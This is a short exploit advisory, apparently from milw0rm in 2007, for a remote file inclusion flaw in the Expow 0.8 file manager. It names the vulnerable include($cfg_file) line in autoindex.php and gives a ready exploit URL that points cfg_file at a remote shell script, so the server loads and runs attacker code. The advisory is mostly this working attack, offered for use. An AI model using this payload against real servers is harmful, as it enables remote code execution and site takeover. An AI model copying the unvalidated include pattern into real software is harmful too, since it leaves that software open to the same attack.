Expow 0.8 File manager Autoindex.php (cfg_file) Remote File Inclusion Vulnerability __________________________________________________________________________ found by : mdx -------------------------------------------------------------------------- Download script : http://sourceforge.net/project/downloading.php?group_id=29595&use_mirror=kent&filename=expow-0.8.tar.gz&92927218 -------------------------------------------------------------------------- file name : autoindex.php __________________________________________________________________________ Ýncluded line ; if (!include($cfg_file)) __________________________________________________________________________ Exploit : http://site.com/[path]/autoindex.php?cfg_file=shellmdx.txt? # milw0rm.com [2007-04-12]